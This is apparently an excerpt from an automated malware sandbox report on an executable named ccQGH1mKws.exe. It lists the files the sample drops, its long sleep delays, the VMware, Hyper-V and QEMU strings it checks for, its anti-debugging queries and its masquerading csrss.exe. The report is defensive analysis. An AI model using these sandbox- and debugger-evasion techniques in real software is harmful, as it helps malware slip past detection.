                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\libogg-0.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-AQ01D.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\SDL2.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-ETRFM.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-NDO9R.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsbD510.tmp\INetC.dllJump to dropped file
                  Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\97EA.dllJump to dropped file
                  Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E33F.exeJump to dropped file
                  Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\671C.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\avcodec-58.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-DCV21.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-UA7KG.tmp\_isetup\_shfoldr.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\libgcc_s_dw2-1.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-TU931.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\swresample-3.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-7865G.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-UA7KG.tmp\_isetup\_setup64.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\libiconv-2.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\unins000.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\libvorbis-0.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-UA7KG.tmp\_isetup\_isdecmp.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-88CHK.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-RGLU2.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-AQ5SU.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\syncUpd[1].exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsfDE87.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\libbz2-1.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_7-11449
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_10-4426
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeAPI coverage: 9.7 %
                  Source: C:\Windows\explorer.exe TID: 1816Thread sleep time: -88400s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 2192Thread sleep time: -71700s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 1816Thread sleep time: -187300s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exe TID: 4464Thread sleep time: -402000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exe TID: 3920Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe TID: 1824Thread sleep time: -600000s >= -30000s
                  Source: C:\ProgramData\Drivers\csrss.exe TID: 5752Thread sleep count: 6753 > 30
                  Source: C:\ProgramData\Drivers\csrss.exe TID: 5752Thread sleep time: -675300s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exe TID: 520Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe TID: 4600Thread sleep count: 1299 > 30
                  Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe TID: 4600Thread sleep time: -2598000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe TID: 1100Thread sleep count: 81 > 30
                  Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe TID: 1100Thread sleep time: -4860000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 316Thread sleep count: 1674 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3412Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4920Thread sleep count: 197 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3608Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\FourthX.exe TID: 2092Thread sleep time: -31000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeFile opened: PHYSICALDRIVE0
                  Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                  Source: C:\ProgramData\Drivers\csrss.exeLast function: Thread delayed
                  Source: C:\ProgramData\Drivers\csrss.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeThread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exeThread delayed: delay time: 60000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: explorer.exe, 00000002.00000000.1534171256.000000000888E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}=
                  Source: explorer.exe, 00000002.00000000.1534171256.0000000008979000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00`
                  Source: 8837.exe, 00000008.00000003.2766763837.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, 8837.exe, 00000008.00000003.2783359206.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, 8837.exe, 00000008.00000003.2711800813.0000000002AD0000.00000004.00000020.00020000.00000000.sdmp, 8837.exe, 00000008.00000003.2755427308.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, 8837.exe, 00000008.00000003.2775292273.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, 8837.exe, 00000008.00000003.2746254584.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, 8837.exe, 00000008.00000003.2789426353.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, 8837.exe, 00000008.00000003.2709104940.0000000002AC3000.00000004.00000020.00020000.00000000.sdmp, 8837.exe, 00000008.00000003.2734689175.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, 8837.exe, 00000008.00000003.2709682388.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, 8837.exe, 00000008.00000003.2724108825.0000000000ADA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >7:qEmu|Z
                  Source: explorer.exe, 00000002.00000000.1534171256.00000000087C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ata\Af7Nc
                  Source: explorer.exe, 00000002.00000000.1534171256.0000000008796000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWe
                  Source: 8837.exe, 00000008.00000003.2745920242.00000000038F3000.00000004.00000020.00020000.00000000.sdmp, 8837.exe, 00000008.00000003.2747214127.000000000391C000.00000004.00000020.00020000.00000000.sdmp, 8837.exe, 00000008.00000003.2746593889.000000000390B000.00000004.00000020.00020000.00000000.sdmp, 8837.exe, 00000008.00000003.2746468325.00000000038FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mul7QhDFSJEjM8DaO4SwI-ef2OfwOJL5vq8OT/r5zKqY6BnOih8n6RHV3ZfJwJfjM-egx8MSEl4LP58Dm9OGfPs/rNBGgUtlXG+jDHF8JHgFs-eg+LEmXl8ieWU+336DqP/G0/8aJ4zS7lkTqqfuwJ7og-eh/165pCOo9Rhqna/NPgoXgzqj1FPwZFmVPBdWaJg+w-eiIMxS+q4kA6Oszx1FETHeYsU3hJ/nAGraIv1XaU93U-eiheONssC27rafOVP++3DRnD3+wmX9BkYaLyoIqplDQ-ei6v5MMmuEx0YBS+/J+jG6V+KKsPjGmn+X5x+fQfzdU-ei9NmNSqE18cJ4zpx/8UwnnWMmvdqxAzfTVXNB/oXJs-ejJvlKMDa64hrz37oWYT/gY9Q06vQWbcI9GVWPmlwhQ-ejLh9VI0ksR79ltiChqc6n/oNUkV1+RDRs+jr4gMku0-ekNbNuxpg4pAhaL2iol5RigFAMzRMm27+lXwLSZ8fS0-ekfJ8qAfi0FYR4Jy7SIQBTqFizuOVgzpLIIDwaPPbiU-ekjdD17WnDCjU9PDpOl5lcDG0BwAhYsIbXGrIdCnOz0-elNHbGyW92ZstgLGATu0mHA3SSbISDtdtkpFtRhjxEQ-emraI0H5XJqmiAQ6lD4p4rTufnIAsfMSLazx7QuoTyg-ensT1UE3wz/HlezwbWGtMWa9OZf6aBzrndB8LoZ4cVA-eoIxWUkdpDh34fE24Fv65/tHKVLCzfag642xN8IllOU-eoOGhT9aVFRI247Ejw83FZf7GX2NsALrHN3pfR8Zba8-eoYhAd1Izs8/Mq/KRJst1hqNRbhdig4Hfh4Xiop8vxo-eo5PoeVaxkx97uTuBempEP7+uCHa4EoTsiI11dzK6lE-epTTn/6KHUYLECHzT4y7FA2juD9oLGYeacjUB35OU6g-epTxdIKr3fCTYCUyTXPQR/U5AzjKQohjifv4QFESylw-eqFnMHheHumUaOZ5/tJTZb0+DDfOC5/rd0pDKNQHd58-eqvZCbB1ZTcQyXOSBfCjTy7E2MYz2xAjVNLO/dGK+os-erBWDQZczqfm0HxNYvnPQtH3LwKVs0F+oP1G9qJ1jrE-erovMFWX+/u4JsrSpcXJb+Q0DdmqJpHmOdusN5GnY7A-eru21/QrtGoXe16ofT2RDGg1mQ+vYl6J4T2fvMPc1Us-eru6dA/tRLLS/zjwULnVGn0QPbRK+dwYQa/vor9jQAc-eshBQCcBl8aWg1FXGs2G3qduoR0Sd18Phu2S3LeN93c-eswIJDJzP95T1os79KuG40FcM3fVkSNIbNKj4ON2Vo8-etaVDqjXcRAUPdZ0iq1RSrN91fMaWvXekWtW5WaPfpU-etsrVCOBbnFnW4xNBWulwyhMftp33UtPx4qogYffOPc-euLo8hQxOGnYXxBLwBCLYra25Xu+qUoFb0LRPkSpuT4-evDzh83iZQOGwhThpcGKEPSZmyP6frEKTMFZ9apc634-evLuTQzTLqFK7M5+SuQ5yl7t1q/w44Jf1ItEjtDmGyo-ev3nFqwnuo9IU5OFG44orT5hbzlCf7OWLn2wBnNC8tg-ewyI6Lej9rYYIBZ4idnQ+WstBe5Rm9Z8XMa0TR57r3o-ezUNfgjMc7FKnykM7ACEZfUqTlFu6Q11YurigiTxDeA-ezgda5H9moseim738Ag96i9WAZhZJmZ38+qNxa8k3B0-ez+oi00DYMB7+cVXh4fuork1b7Sy0QlgoJk6XgiU/AM-e0rdYYXwlP79lnKahz0VNAT0W4/55MTNlxRP3DOs9ug-e1gSpno6KmV6x2PZKS7qKrdDWq8DO3RS7TIEUcqixpI-e1tnHkrve/ex6423Gj3ifjmPJAeU19bbWwHE+i04XsE-e162F938bxWKKyCYK91G8byPqOqGTyji6LBQFDRT2zc-e22kuU/RfDacLE+l/KpyVGGEoHLZyLBIpjquN237lT0-e31u7SMky76ygmxEdWNk3HKxXIe1MBVjBqJqcWbMINw-e35/gDdiLRBRq31STbKcaMSKEnZ/LSNZPszXJiJMNqI-e4S8yi3qv3XuBn9t7ylX9JURiMC+r4VGcP0lO+AziXU-e4lVeMdc+CDfWP9aiVzXesicc9cJh93y1hTHHgvoJE8-e41BLZM1I3EgKaVT/OsuJERvNynwmTSfueq9IFb7jpQ-e5fo3c8VekzioPQKgD7vmnPUnDw4mwb3nAIvtv57sac-e5vDZKUWW2rugfRJEbCQx/zHAnfHAHsTqOw7NyrETwk-e6xM+zKnDwa/LtcntndALfB059oFwmv14L6gHnz/WRo-e6xjm5GgYDUS12PmlN8nzBMqpJzVvXMSZEQ3vlZ/2SU-e7QmqCiQghaccS0dAmUTIi7xqHpkFpGm+r1Y0bAKvHo-e7zIKEIU6THMGFZUWnZ3GzgZqvJDpi+qlHo2iiHcmgM-e8KgVMp1MLu5JYLOOlmJPLPnFlPb+xHm4BxVyMRx3g0-e81DiL1CfSZFrsb5ttv9jvDnwdhfC2h7qQqbLw9oqso-e8/UpPXnvMMFV4i3u/DtDiVwoiltkL3/bhApG80zHig-e+ahS69dNNL+OMZfTrOWOlYSPk75s7J4odyOxicarbs-e+ko3ra6wpp9qkplg8J5GNxRF4UtxiIB0EDm5g5tXy0-e/tvZBkYAJGf2lnFlbtJjq1OiDc9TxvWO4yBUJD3PIM-fA0brBRDWMycEsC36RU43T3w7qpfpjdSgnAH45IOJ8A-fBDwqJaaE06Q7A6gzdDGAGW3tUVxUkpXR4/iEwNpvnM-fB7eo59mpkT8dehLT7HG92tXS0OdubBbleYOsDN8QBA-fB8V5fgDuQOuiv0x0G7Xe35ShykDwJJezOY0lrUF0Mc-fCXABMNA2yf0nn7G4lQMHhJ+du1vXSPCzh/I2Ku3F3o-fCj9FbMUOiNzz/Db1SiN3zEshPd7ue
                  Source: explorer.exe, 00000002.00000000.1534171256.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1534171256.0000000008685000.00000004.00000001.00020000.00000000.sdmp, 8E91.exe, 00000009.00000002.1991101064.00000000010F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: explorer.exe, 00000002.00000000.1531274951.0000000007065000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@g6O
                  Source: explorer.exe, 00000002.00000000.1528699265.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000^F1O
                  Source: explorer.exe, 00000002.00000000.1534171256.00000000087C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000d
                  Source: 8837.exe, 00000008.00000003.2697487110.00000000035A1000.00000004.00000020.00020000.00000000.sdmp, 8837.exe, 00000008.00000003.2702403229.0000000003840000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m egx8MSEl4LP58Dm9OGfPs/rNBGgUtlXG+jDHF8JHgFs
                  Source: explorer.exe, 00000002.00000000.1534171256.00000000088E6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                  Source: 8837.exe, 00000008.00000003.2745920242.00000000038F3000.00000004.00000020.00020000.00000000.sdmp, 8837.exe, 00000008.00000003.2747214127.000000000391C000.00000004.00000020.00020000.00000000.sdmp, 8837.exe, 00000008.00000003.2746593889.000000000390B000.00000004.00000020.00020000.00000000.sdmp, 8837.exe, 00000008.00000003.2746468325.00000000038FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ul7QhDFSJEjM8DaO4SwI-ef2OfwOJL5vq8OT/r5zKqY6BnOih8n6RHV3ZfJwJfjM-egx8MSEl4LP58Dm9OGfPs/rNBGgUtlXG+jDHF8JHgFs-eg+LEmXl8ieWU+336DqP/G0/8aJ4zS7lkTqqfuwJ7og-eh/165pCOo9Rhqna/NPgoXgzqj1FPwZFmVPBdWaJg+w-eiIMxS+q4kA6Oszx1FETHeYsU3hJ/nAGraIv1XaU93U-eiheONssC27rafOVP++3DRnD3+wmX9BkYaLyoIqplDQ-ei6v5MMmuEx0YBS+/J+jG6V+KKsPjGmn+X5x+fQfzdU-ei9NmNSqE18cJ4zpx/8UwnnWMmvdqxAzfTVXNB/oXJs-ejJvlKMDa64hrz37oWYT/gY9Q06vQWbcI9GVWPmlwhQ-ejLh9VI0ksR79ltiChqc6n/oNUkV1+RDRs+jr4gMku0-ekNbNuxpg4pAhaL2iol5RigFAMzRMm27+lXwLSZ8fS0-ekfJ8qAfi0FYR4Jy7SIQBTqFizuOVgzpLIIDwaPPbiU-ekjdD17WnDCjU9PDpOl5lcDG0BwAhYsIbXGrIdCnOz0-elNHbGyW92ZstgLGATu0mHA3SSbISDtdtkpFtRhjxEQ-emraI0H5XJqmiAQ6lD4p4rTufnIAsfMSLazx7QuoTyg-ensT1UE3wz/HlezwbWGtMWa9OZf6aBzrndB8LoZ4cVA-eoIxWUkdpDh34fE24Fv65/tHKVLCzfag642xN8IllOU-eoOGhT9aVFRI247Ejw83FZf7GX2NsALrHN3pfR8Zba8-eoYhAd1Izs8/Mq/KRJst1hqNRbhdig4Hfh4Xiop8vxo-eo5PoeVaxkx97uTuBempEP7+uCHa4EoTsiI11dzK6lE-epTTn/6KHUYLECHzT4y7FA2juD9oLGYeacjUB35OU6g-epTxdIKr3fCTYCUyTXPQR/U5AzjKQohjifv4QFESylw-eqFnMHheHumUaOZ5/tJTZb0+DDfOC5/rd0pDKNQHd58-eqvZCbB1ZTcQyXOSBfCjTy7E2MYz2xAjVNLO/dGK+os-erBWDQZczqfm0HxNYvnPQtH3LwKVs0F+oP1G9qJ1jrE-erovMFWX+/u4JsrSpcXJb+Q0DdmqJpHmOdusN5GnY7A-eru21/QrtGoXe16ofT2RDGg1mQ+vYl6J4T2fvMPc1Us-eru6dA/tRLLS/zjwULnVGn0QPbRK+dwYQa/vor9jQAc-eshBQCcBl8aWg1FXGs2G3qduoR0Sd18Phu2S3LeN93c-eswIJDJzP95T1os79KuG40FcM3fVkSNIbNKj4ON2Vo8-etaVDqjXcRAUPdZ0iq1RSrN91fMaWvXekWtW5WaPfpU-etsrVCOBbnFnW4xNBWulwyhMftp33UtPx4qogYffOPc-euLo8hQxOGnYXxBLwBCLYra25Xu+qUoFb0LRPkSpuT4-evDzh83iZQOGwhThpcGKEPSZmyP6frEKTMFZ9apc634-evLuTQzTLqFK7M5+SuQ5yl7t1q/w44Jf1ItEjtDmGyo-ev3nFqwnuo9IU5OFG44orT5hbzlCf7OWLn2wBnNC8tg-ewyI6Lej9rYYIBZ4idnQ+WstBe5Rm9Z8XMa0TR57r3o-ezUNfgjMc7FKnykM7ACEZfUqTlFu6Q11YurigiTxDeA-ezgda5H9moseim738Ag96i9WAZhZJmZ38+qNxa8k3B0-ez+oi00DYMB7+cVXh4fuork1b7Sy0QlgoJk6XgiU/AM-e0rdYYXwlP79lnKahz0VNAT0W4/55MTNlxRP3DOs9ug-e1gSpno6KmV6x2PZKS7qKrdDWq8DO3RS7TIEUcqixpI-e1tnHkrve/ex6423Gj3ifjmPJAeU19bbWwHE+i04XsE-e162F938bxWKKyCYK91G8byPqOqGTyji6LBQFDRT2zc-e22kuU/RfDacLE+l/KpyVGGEoHLZyLBIpjquN237lT0-e31u7SMky76ygmxEdWNk3HKxXIe1MBVjBqJqcWbMINw-e35/gDdiLRBRq31STbKcaMSKEnZ/LSNZPszXJiJMNqI-e4S8yi3qv3XuBn9t7ylX9JURiMC+r4VGcP0lO+AziXU-e4lVeMdc+CDfWP9aiVzXesicc9cJh93y1hTHHgvoJE8-e41BLZM1I3EgKaVT/OsuJERvNynwmTSfueq9IFb7jpQ-e5fo3c8VekzioPQKgD7vmnPUnDw4mwb3nAIvtv57sac-e5vDZKUWW2rugfRJEbCQx/zHAnfHAHsTqOw7NyrETwk-e6xM+zKnDwa/LtcntndALfB059oFwmv14L6gHnz/WRo-e6xjm5GgYDUS12PmlN8nzBMqpJzVvXMSZEQ3vlZ/2SU-e7QmqCiQghaccS0dAmUTIi7xqHpkFpGm+r1Y0bAKvHo-e7zIKEIU6THMGFZUWnZ3GzgZqvJDpi+qlHo2iiHcmgM-e8KgVMp1MLu5JYLOOlmJPLPnFlPb+xHm4BxVyMRx3g0-e81DiL1CfSZFrsb5ttv9jvDnwdhfC2h7qQqbLw9oqso-e8/UpPXnvMMFV4i3u/DtDiVwoiltkL3/bhApG80zHig-e+ahS69dNNL+OMZfTrOWOlYSPk75s7J4odyOxicarbs-e+ko3ra6wpp9qkplg8J5GNxRF4UtxiIB0EDm5g5tXy0-e/tvZBkYAJGf2lnFlbtJjq1OiDc9TxvWO4yBUJD3PIM-fA0brBRDWMycEsC36RU43T3w7qpfpjdSgnAH45IOJ8A-fBDwqJaaE06Q7A6gzdDGAGW3tUVxUkpXR4/iEwNpvnM-fB7eo59mpkT8dehLT7HG92tXS0OdubBbleYOsDN8QBA-fB8V5fgDuQOuiv0x0G7Xe35ShykDwJJezOY0lrUF0Mc-fCXABMNA2yf0nn7G4lQMHhJ+du1vXSPCzh/I2Ku3F3o-fCj9FbMUOiNzz/Db1SiN3zEshPd7uea
                  Source: explorer.exe, 00000002.00000000.1534171256.00000000088E6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}l
                  Source: explorer.exe, 00000002.00000000.1528699265.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                  Source: explorer.exe, 00000002.00000000.1534171256.00000000088E6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: 8837.exe, 00000008.00000003.2943071340.000000000347A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCQ+Mgq8T7UeC/2woYMrFlxjDMFr68VrX2WjJ7YjnLbHGfSDEn0XiQNjKrjsFj8m
                  Source: explorer.exe, 00000002.00000000.1528699265.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 00000002.00000000.1534171256.00000000088E6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeAPI call chain: ExitProcess graph end nodegraph_7-11570
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeAPI call chain: ExitProcess graph end nodegraph_16-4393
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeSystem information queried: ModuleInformationJump to behavior
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeSystem information queried: CodeIntegrityInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\afratejSystem information queried: CodeIntegrityInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DC49.exeSystem information queried: CodeIntegrityInformation
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Roaming\afratejProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DC49.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: 10_2_00409543 GetWindowsDirectoryW,NtAllocateVirtualMemory,EnterCriticalSection,RtlInitUnicodeString,RtlInitUnicodeString,LeaveCriticalSection,LdrEnumerateLoadedModules,10_2_00409543
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeCode function: 7_2_00401114 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00401114
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_004165C0 LoadLibraryW,GetProcAddress,VirtualProtect,1_2_004165C0
